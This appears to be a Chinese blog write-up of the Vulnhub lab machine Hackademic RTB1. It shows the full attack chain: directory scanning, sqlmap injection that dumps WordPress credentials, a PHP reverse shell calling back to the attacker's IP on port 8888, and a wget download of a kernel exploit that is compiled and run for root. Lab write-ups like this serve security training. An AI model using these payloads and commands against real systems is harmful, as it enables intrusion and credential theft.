【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

靶机介绍

官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/

需要读取靶机的root目录下key.txt

运行环境:

虚拟机网络设置的是NAT模式

靶机:IP地址:192.168.233.131

攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

进入靶机

​​

用wappalyzer查看用到技术

查看开放的端口

扫敏感目录

nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

GeorgeMiller、q1w2e3登录

getshell

shell.php

<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

kali打开监听

运行反弹shell

反弹shell成功

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

​搜索内核漏洞

searchsploit 2.6.31

下载到本地searchsploit -m 15285.c

​kali开启web服务器

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

编译脚本

gcc 15285.c -o exp

将编译的exp赋予执行权限并执行exp

提权成功id为0

相关推荐
丫头,冲鸭!!!2 分钟前
B树(B-Tree)和B+树(B+ Tree)
笔记·算法
听忆.22 分钟前
手机屏幕上进行OCR识别方案
笔记
weixin_4426434241 分钟前
推荐FileLink数据跨网摆渡系统 — 安全、高效的数据传输解决方案
服务器·网络·安全·filelink数据摆渡系统
Selina K1 小时前
shell脚本知识点记录
笔记·shell
星尘安全1 小时前
安全工程师入侵加密货币交易所获罪
安全·区块链·漏洞·加密货币
1 小时前
开源竞争-数据驱动成长-11/05-大专生的思考
人工智能·笔记·学习·算法·机器学习
霍格沃兹测试开发学社测试人社区2 小时前
软件测试学习笔记丨Flask操作数据库-数据库和表的管理
软件测试·笔记·测试开发·学习·flask
幸运超级加倍~2 小时前
软件设计师-上午题-16 算法(4-5分)
笔记·算法
王俊山IT3 小时前
C++学习笔记----10、模块、头文件及各种主题(一)---- 模块(5)
开发语言·c++·笔记·学习
newxtc3 小时前
【支付行业-支付系统架构及总结】
安全·支付宝·第三方支付·风控系统·财付通